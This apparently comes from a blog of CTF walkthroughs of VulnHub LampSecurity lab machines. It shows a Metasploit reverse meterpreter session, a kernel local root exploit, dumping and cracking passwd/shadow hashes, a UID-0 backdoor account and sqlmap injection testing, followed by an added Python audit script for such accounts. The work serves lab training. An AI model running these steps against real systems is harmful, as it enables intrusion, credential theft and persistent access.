Payload options (linux/x86/shell/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.110 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.110 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.56.110:4444
[*] Starting the payload handler...

Step 4:





Step 5:
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.56.110:4444
[*] Starting the payload handler...
[*] Sending stage (40499 bytes) to 192.168.56.101
[*] Meterpreter session 3 opened (192.168.56.110:4444 -> 192.168.56.101:35181) at 2015-10-31 23:49:23 +0000

meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux localhost.localdomain 2.6.23.1-42.fc8 #1 SMP Tue Oct 30 13:55:12 EDT 2007 i686
Meterpreter : php/php

meterpreter > getuid
Server username: apache (48)
meterpreter > getpid
Current pid: 6464


We have a shell now.

However, we are in as the apache user. We need to attempt privilege escalation.


Now steps I will try :

Step 1 : As I am on KALI Linux, I will search for PE exploits locally first
root@kali:~/vulhub/ctf5# searchsploit 2.6.23 local linux
------------------------------------------------------------- ---------------------
 Description                                                  | Path
------------------------------------------------------------- ---------------------
 Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit  | /linux/local/5093.c
------------------------------------------------------------- ---------------------

Step 2 : Compile the binary
root@kali:~/vulhub/ctf5# locate /linux/local/5093.c
/usr/share/exploitdb/platforms/linux/local/5093.c
root@kali:~/vulhub/ctf5# cp /usr/share/exploitdb/platforms/linux/local/5093.c .
root@kali:~/vulhub/ctf5# ls -ltr
total 4
-rwxr-xr-x 1 root root 2883 Nov 1 00:02 5093.c
root@kali:~/vulhub/ctf5# gcc 5093.c -o 5093

Step 3 : Transfer the file to the victim from the meterpreter session
meterpreter > lcd vulhub
meterpreter > lcd ctf5
meterpreter > lpwd
/root/vulhub/ctf5
meterpreter > upload 5093 /tmp/5093
[*] uploading : 5093 -> /tmp/5093
[*] uploaded : 5093 -> /tmp/5093

Step 4 : Now execute the file and see if we get root

meterpreter> shell
Process 13468 created.
Channel 2 created.

cd /tmp

ls
5093
gconfd-patrick
gconfd-root
gnome-system-monitor.patrick.3563912106
mapping-andy
mapping-jennifer
mapping-loren
mapping-patrick
mapping-root


./5093
/bin/sh: line 9: ./5093: Permission denied

chmod +x 5093


./5093
bash: no job control in this shell

bash-3.2# id
uid=0(root) gid=0(root) groups=48(apache) context=system_u:system_r:httpd_t:s0

bash-3.2# whoami
root
WE ARE ROOT NOW !!

Post Exploit:

bash-3.2# cat passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
torrent:x:497:496:BitTorrent Seed/Tracker:/var/spool/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash


bash-3.2# cat shadow
root:$1$7ailm4aT$4HlsZaiGztAsgj4JXL92Y.:14362:0:99999:7:::
bin:*:14362:0:99999:7:::
daemon:*:14362:0:99999:7:::
adm:*:14362:0:99999:7:::
lp:*:14362:0:99999:7:::
sync:*:14362:0:99999:7:::
shutdown:*:14362:0:99999:7:::
halt:*:14362:0:99999:7:::
mail:*:14362:0:99999:7:::
news:*:14362:0:99999:7:::
uucp:*:14362:0:99999:7:::
operator:*:14362:0:99999:7:::
games:*:14362:0:99999:7:::
gopher:*:14362:0:99999:7:::
ftp:*:14362:0:99999:7:::
nobody:*:14362:0:99999:7:::
vcsa:!!:14362:0:99999:7:::
rpc:!!:14362:0:99999:7:::
nscd:!!:14362:0:99999:7:::
tcpdump:!!:14362:0:99999:7:::
dbus:!!:14362:0:99999:7:::
rpm:!!:14362:0:99999:7:::
polkituser:!!:14362:0:99999:7:::
avahi:!!:14362:0:99999:7:::
mailnull:!!:14362:0:99999:7:::
smmsp:!!:14362:0:99999:7:::
apache:!!:14362:0:99999:7:::
ntp:!!:14362:0:99999:7:::
sshd:!!:14362:0:99999:7:::
openvpn:!!:14362:0:99999:7:::
rpcuser:!!:14362:0:99999:7:::
nfsnobody:!!:14362:0:99999:7:::
torrent:!!:14362:0:99999:7:::
haldaemon:!!:14362:0:99999:7:::
gdm:!!:14362:0:99999:7:::
patrick:$1$DJYtkxSw$t.47LsE1j2VJKgBVT1Lar0:15679:0:99999:7:::
jennifer:$1$04FqEhSX$Nft0Rs7H2VhUK.fX53cPb1:15679:0:99999:7:::
andy:$1$29jCTuBP$OvytZOP3NacMeAcrbpoMR.:15679:0:99999:7:::
loren:$1$fWsonMXA$1uVln.k4Bh81j2zhCU1jL.:14362:0:99999:7:::
amy:$1$DDLpVzyX$zez4/KCciNorxsjZspzTM0:15679:0:99999:7:::
mysql:!!:14362::::::
cyrus:$1$BzxZidrU$dYMc0ad3NmEJX8L9dNrqJ0:14363::::::

bash-3.2# cd /home
bash-3.2# ls
amy
andy
jennifer
loren
patrick

bash-3.2# cat /etc/issue
Fedora release 8 (Werewolf)
Kernel \r on an \m

bash-3.2# cat /etc/redhat-release
Fedora release 8 (Werewolf)

bash-3.2# ifconfig
eth1 Link encap:Ethernet HWaddr 08:00:27:C3:02:2B
inet addr:192.168.56.101 Bcast:192.168.56.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fec3:22b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:162306 errors:2 dropped:0 overruns:0 frame:0
TX packets:178176 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:20857470 (19.8 MiB) TX bytes:91664318 (87.4 MiB)
Interrupt:10 Base address:0xd020

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:3068 errors:0 dropped:0 overruns:0 frame:0
TX packets:3068 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:239589 (233.9 KiB) TX bytes:239589 (233.9 KiB)

bash-3.2# cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
::1 localhost6.localdomain6 localhost6


Let's crack the passwords now:

root@kali:~/vulhub/ctf5# john amy.pw
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
dolphins (amy)
guesses: 1 time: 0:00:00:01 DONE (Sun Nov 1 00:20:40 2015) c/s: 7394 trying: 1234qwer- johnson
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ctf5# john andy.pw
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
marvin1 (andy)
guesses: 1 time: 0:00:00:02 DONE (Sun Nov 1 00:21:29 2015) c/s: 9584 trying: kimberly1 - moore1
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ctf5# john patrick.pw
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
ne1410s (patrick)
guesses: 1 time: 0:00:00:01 DONE (Sun Nov 1 00:24:13 2015) c/s: 8630 trying: nexus6 - OU812
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ctf5# john jeniffer.pw
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
homebrew (jennifer)
guesses: 1 time: 0:00:00:01 DONE (Sun Nov 1 00:25:05 2015) c/s: 8560 trying: nexus6 - OU812
Use the "--show" option to display all of the cracked passwords reliably

Cracking the root hash with John seems tedious, so let's use hashcat for this purpose and try..

root@kali:~/vulhub/ctf5# hashcat -m 500 root.hash /usr/share/wordlists/rockyou.txt
This copy of hashcat will expire on 01.01.2016. Please upgrade to continue using hashcat.

Initializing hashcat v0.49 with 1 threads and 32mb segment-size...

Added hashes from file root.hash: 1 (1 salts)
Activating quick-digest mode for single-hash with salt

NOTE: press enter for status-screen



Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3605274 (words), 33550339 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 4.54k plains, 4.54k words
Progress..: 10620/3605274 (0.29%)
Running...: 00:00:00:03
Estimated.: 00:00:13:12

+++ Truncated +++

Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3605274 (words), 33550339 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 5.63k plains, 5.63k words
Progress..: 3605274/3605274 (100.00%)
Running...: 00:00:10:40
Estimated.: --:--:--:--



Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 2/5 (segment), 3313542 (words), 33550340 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 6.60k plains, 6.60k words
Progress..: 1449296/3313542 (43.74%)
Running...: 00:00:03:39
Estimated.: 00:00:04:42


Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 2/5 (segment), 3313542 (words), 33550340 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 7.34k plains, 7.34k words
Progress..: 3313542/3313542 (100.00%)
Running...: 00:00:07:31
Estimated.: --:--:--:--

++++++ Truncated ++++++

Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 3/5 (segment), 3282543 (words), 33550336 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 7.92k plains, 7.92k words
Progress..: 3282543/3282543 (100.00%)
Running...: 00:00:06:55
Estimated.: --:--:--:--

$1$7ailm4aT$4HlsZaiGztAsgj4JXL92Y.:50$cent

All hashes have been recovered

Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 4/5 (segment), 3467513 (words), 33550343 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 9.13k words
Progress..: 1950272/3467513 (56.24%)
Running...: 00:00:03:34
Estimated.: 00:00:02:46

Started: Sun Nov 1 00:39:44 2015
Stopped: Sun Nov 1 01:08:25 2015


So we see it took around 30 minutes to get the password for root.

root@kali:~/vulhub/ctf5# ssh 192.168.56.101
root@192.168.56.101's password:
Last login: Sat Oct 31 01:43:00 2015 from 192.168.56.110
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
[root@localhost ~]# whoami
root
[root@localhost ~]#



Creating a backdoor user with root privileges :

bash-3.2# useradd -ou 0 -g 0 johnsnow
bash-3.2# passwd johnshow
passwd: Unknown user name 'johnshow'.
bash-3.2# cat /etc/passwd | grep john
johnsnow:x:0:0::/home/johnsnow:/bin/bash

bash-3.2# passwd johnsnow
New UNIX password: john
BAD PASSWORD: it is too short
Retype new UNIX password: john
Changing password for user johnsnow.
passwd: all authentication tokens updated successfully.

Testing user :

root@kali:~/vulhub/ctf5# ssh johnsnow@192.168.56.101
johnsnow@192.168.56.101's password:
Last login: Wed Dec 5 07:28:50 2012
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:system_r:unconfined_t:s0
[root@localhost ~]#
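
As an added defensive check (not part of the walkthrough), the following Python script audits a passwd/shadow pair of the kind dumped above: it flags any second UID-0 account such as the johnsnow backdoor, reports accounts still using legacy md5crypt ($1$) hashes, and tests those hashes against a small weak-password list using a pure-Python port of md5crypt. The sample passwd/shadow lines are taken from this page; the weak-password list is constructed for the demo.

```python
"""Account audit over a passwd/shadow pair like the ones dumped above.  Added
example, not code from the walkthrough: it lists extra UID-0 accounts (the
'johnsnow' pattern), reports accounts still hashed with legacy md5crypt ($1$),
and checks those hashes against a short weak-password list.  md5crypt is a
pure-Python port of the FreeBSD algorithm; the sample passwd/shadow lines are
copied from this page and the weak-password list is constructed for the demo."""
import hashlib

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def md5crypt(password: bytes, salt: bytes) -> str:
    """$1$ md5crypt: 1000 MD5 rounds, compatible with glibc/FreeBSD crypt(3)."""
    salt, magic = salt[:8], b"$1$"
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    for i in range(len(password)):          # as many bytes of alt as the password is long
        ctx.update(alt[i % 16:i % 16 + 1])
    i = len(password)
    while i:                                 # the algorithm's bit-walk over the length
        ctx.update(b"\0" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):                    # stretching rounds
        h = hashlib.md5()
        h.update(password if i & 1 else final)
        if i % 3:
            h.update(salt)
        if i % 7:
            h.update(password)
        h.update(final if i & 1 else password)
        final = h.digest()
    out = bytearray()                        # crypt-style base64 over a permuted digest
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        v = final[a] << 16 | final[b] << 8 | final[c]
        for _ in range(4):
            out.append(ITOA64[v & 0x3F])
            v >>= 6
    v = final[11]
    for _ in range(2):
        out.append(ITOA64[v & 0x3F])
        v >>= 6
    return (magic + salt + b"$" + bytes(out)).decode()


def verify_md5crypt(password: str, shadow_hash: str) -> bool:
    """True if password matches a '$1$<salt>$<hash>' shadow entry."""
    parts = shadow_hash.split("$")
    if len(parts) != 4 or parts[1] != "1":
        return False
    return md5crypt(password.encode(), parts[2].encode()) == shadow_hash


def extra_uid0_accounts(passwd_text: str) -> list:
    """Names of accounts other than root whose UID is 0."""
    hits = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) >= 7 and f[2] == "0" and f[0] != "root":
            hits.append(f[0])
    return hits


def audit_shadow(shadow_text: str, weak_passwords: list) -> dict:
    """user -> 'weak:<password>' if a listed password matches the md5crypt
    hash, else 'legacy-md5crypt'; locked (!!, *) entries are skipped."""
    findings = {}
    for line in shadow_text.splitlines():
        f = line.split(":")
        if len(f) < 2 or not f[1].startswith("$1$"):
            continue
        match = next((p for p in weak_passwords if verify_md5crypt(p, f[1])), None)
        findings[f[0]] = f"weak:{match}" if match else "legacy-md5crypt"
    return findings


# Sample lines copied from the passwd/shadow dumps on this page.
PASSWD_SAMPLE = """root:x:0:0:root:/root:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
johnsnow:x:0:0::/home/johnsnow:/bin/bash
"""
SHADOW_SAMPLE = """root:$1$7ailm4aT$4HlsZaiGztAsgj4JXL92Y.:14362:0:99999:7:::
apache:!!:14362:0:99999:7:::
amy:$1$DDLpVzyX$zez4/KCciNorxsjZspzTM0:15679:0:99999:7:::
"""
# Constructed demo list; a real audit would feed a full wordlist instead.
WEAK_PASSWORDS = ["password", "dolphins", "50$cent"]

if __name__ == "__main__":
    print("extra UID-0 accounts:", extra_uid0_accounts(PASSWD_SAMPLE))
    for user, finding in audit_shadow(SHADOW_SAMPLE, WEAK_PASSWORDS).items():
        print(f"{user}: {finding}")
```

The same verifier confirms the CTF4 root crack further down the page, since that hash is md5crypt as well.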


Saturday, October 31, 2015

Tango Down (CTF4) : Capture The Flag (CTF) 4 Lamp Security Challenge


Lab Environment :

Victim Host : https://www.vulnhub.com/entry/lampsecurity-ctf4,83/  on VirtualBox (MacOS)
Attacking Host : KALI (On Virtual Box)
Network : Host-Only (VirtualBox)
Tools : As mentioned in the walkthrough below


Discovery :

- Find the IP: start the VM with its network set to Host-Only; since we know the subnet the host-only network uses, just run an nmap scan to identify the victim's IP.

We got the below IP and services :

Nmap scan report for 192.168.56.101
Host is up (0.00043s latency).
Not shown: 96 filtered ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
631/tcp closed ipp
MAC Address: 08:00:27:37:40:F6 (Cadmus Computer Systems)


To confirm, telnet to port 25:
root@kali:~# telnet 192.168.56.101 25

Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
220 ctf4.sas.upenn.edu ESMTP Sendmail 8.13.5/8.13.5; Sat, 24 Oct 2015 00:05:52 -0400
HELO
501 5.0.0 HELO requires domain address
VRY root
500 5.5.1 Command unrecognized: "VRY root"
help
214-2.0.0 This is sendmail version 8.13.5
214-2.0.0 Topics:
214-2.0.0 HELO EHLO MAIL RCPT DATA
214-2.0.0 RSET NOOP QUIT HELP VRFY
214-2.0.0 EXPN VERB ETRN DSN AUTH
214-2.0.0 STARTTLS
214-2.0.0 For more info use "HELP <topic>".
214-2.0.0 To report bugs in the implementation send email to
214-2.0.0 sendmail-bugs@sendmail.org.
214-2.0.0 For local information send email to Postmaster at your site.
214 2.0.0 End of HELP info
VRFY root
250 2.1.5 <root@ctf4.sas.upenn.edu>

This is the host.

Now we will do further scanning and enumeration :

Port 80 :

A normal, static-looking site seems to be hosted here. Running nikto on this..




Vulnerability Assessment and Exploit :

Testing SQL Injection :
root@kali:~/vulhub/ct4# sqlmap -u http://192.168.56.101 --crawl=3

sqlmap {1.0-dev-nongit-20150429} http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:17:44

do you want to check for the existence of site's sitemap(.xml) [Y/n]
[01:17:46] [INFO] no links found
[01:17:46] [INFO] starting crawler
[01:17:46] [INFO] searching for links with depth 1
[01:17:46] [INFO] searching for links with depth 2
please enter number of threads? [Enter for 1 (current)]
[01:17:48] [WARNING] running in a single-thread mode. This could take a while
[01:17:48] [INFO] searching for links with depth 3
please enter number of threads? [Enter for 1 (current)] 3
[01:17:58] [INFO] starting 3 threads
do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N]
[01:18:00] [INFO] sqlmap got a total of 8 targets
URL 1:
GET http://192.168.56.101:80/index.html?title=Home Page
do you want to test this URL? [Y/n/q]
>
[01:18:02] [INFO] testing URL 'http://192.168.56.101:80/index.html?title=Home Page'
[01:18:02] [INFO] using '/root/.sqlmap/output/results-10242015_0118am.csv' as the CSV results file in multiple targets mode
[01:18:02] [INFO] testing connection to the target URL
[01:18:02] [WARNING] the web server responded with an HTTP error code (404) which could interfere with the results of the tests
[01:18:02] [INFO] testing if the target URL is stable. This can take a couple of seconds
[01:18:03] [INFO] target URL is stable
[01:18:03] [INFO] testing if GET parameter 'title' is dynamic
[01:18:03] [WARNING] GET parameter 'title' does not appear dynamic
[01:18:03] [WARNING] heuristic (basic) test shows that GET parameter 'title' might not be injectable
[01:18:03] [INFO] heuristic (XSS) test shows that GET parameter 'title' might be vulnerable to XSS attacks
[01:18:03] [INFO] testing for SQL injection on GET parameter 'title'
[01:18:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:18:03] [WARNING] reflective value(s) found and filtering out
[01:18:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:18:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:18:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:18:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:18:04] [INFO] testing 'MySQL inline queries'
[01:18:04] [INFO] testing 'PostgreSQL inline queries'
[01:18:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:18:04] [INFO] testing 'Oracle inline queries'
[01:18:04] [INFO] testing 'SQLite inline queries'
[01:18:04] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:18:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:18:04] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:18:04] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'
[01:18:04] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:18:04] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:18:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:18:04] [INFO] testing 'Oracle AND time-based blind'
[01:18:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:18:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:18:05] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[01:18:06] [WARNING] GET parameter 'title' is not injectable
[01:18:06] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 2:
GET http://192.168.56.101:80/index.html?page=blog&title=Blog
do you want to test this URL? [Y/n/q]
>
[01:18:12] [INFO] testing URL 'http://192.168.56.101:80/index.html?page=blog&title=Blog'
[01:18:12] [INFO] testing connection to the target URL
[01:18:12] [WARNING] the web server responded with an HTTP error code (404) which could interfere with the results of the tests
[01:18:12] [INFO] testing if the target URL is stable. This can take a couple of seconds
[01:18:13] [INFO] target URL is stable
[01:18:13] [INFO] testing if GET parameter 'page' is dynamic
[01:18:13] [INFO] confirming that GET parameter 'page' is dynamic
[01:18:13] [INFO] GET parameter 'page' is dynamic
[01:18:13] [WARNING] heuristic (basic) test shows that GET parameter 'page' might not be injectable
[01:18:13] [INFO] testing for SQL injection on GET parameter 'page'
[01:18:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:18:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:18:13] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:18:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:18:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:18:13] [INFO] testing 'MySQL inline queries'
[01:18:13] [INFO] testing 'PostgreSQL inline queries'
[01:18:13] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:18:13] [INFO] testing 'Oracle inline queries'
[01:18:13] [INFO] testing 'SQLite inline queries'
[01:18:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:18:13] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:18:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:18:13] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'
[01:18:13] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:18:13] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:18:14] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:18:14] [INFO] testing 'Oracle AND time-based blind'
[01:18:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:18:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:18:14] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[01:18:15] [WARNING] GET parameter 'page' is not injectable
[01:18:15] [INFO] skipping previously processed GET parameter 'title'
[01:18:15] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[01:18:15] [INFO] skipping 'http://192.168.56.101:80/index.html?page=research&title=Research'
[01:18:15] [INFO] skipping 'http://192.168.56.101:80/index.html?page=contact&title=Contact'
URL 3:
GET http://192.168.56.101:80/index.html?page=blog&title=Blog&id=2
do you want to test this URL? [Y/n/q]
>
[01:18:19] [INFO] testing URL 'http://192.168.56.101:80/index.html?page=blog&title=Blog&id=2'
[01:18:19] [INFO] testing connection to the target URL
[01:18:19] [WARNING] the web server responded with an HTTP error code (404) which could interfere with the results of the tests
[01:18:19] [INFO] testing if the target URL is stable. This can take a couple of seconds
[01:18:20] [INFO] target URL is stable
[01:18:20] [INFO] skipping previously processed GET parameter 'page'
[01:18:20] [INFO] skipping previously processed GET parameter 'title'
[01:18:20] [INFO] testing if GET parameter 'id' is dynamic
[01:18:20] [INFO] confirming that GET parameter 'id' is dynamic
[01:18:20] [INFO] GET parameter 'id' is dynamic
[01:18:20] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[01:18:20] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[01:18:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:18:39] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[01:18:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:18:39] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[01:18:39] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[01:18:39] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[01:18:39] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[01:18:39] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[01:18:39] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[01:18:39] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
[01:18:39] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[01:18:39] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[01:18:39] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[01:18:39] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[01:18:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[01:18:39] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[01:18:39] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[01:18:39] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[01:18:39] [INFO] testing 'MySQL inline queries'
[01:18:39] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:18:39] [WARNING] time-based comparison requires larger statistical model, please wait..
[01:18:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[01:18:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'
[01:18:49] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT)' injectable
[01:18:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
